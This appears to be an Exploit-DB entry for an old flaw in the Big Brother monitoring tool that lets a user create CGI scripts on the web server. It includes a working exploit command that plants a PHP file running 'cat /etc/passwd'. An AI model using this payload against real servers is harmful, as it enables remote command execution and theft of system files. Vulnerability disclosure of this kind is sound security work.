Sean MacGuire Big Brother 1.0/1.3/1.4 - CGI File Creation

EDB-ID:

20092


Author:

xternal

Type:

local


Platform:

CGI

Date:

2001-06-11


source: https://www.securityfocus.com/bid/1494/info

A vulnerability in Big Brother exists which would allow a user to remotely create CGI scripts which could be requested from the Web Server. These could be used to read files and possibly execute commands on the web server machine. 

./bb 1.2.3.4 "status evil.php3 <?<system(\"cat /etc/passwd\");?>"

will allow viewing of the /etc/passwd upon browsing to http://1.2.3.4/bb/logs/evil.php3.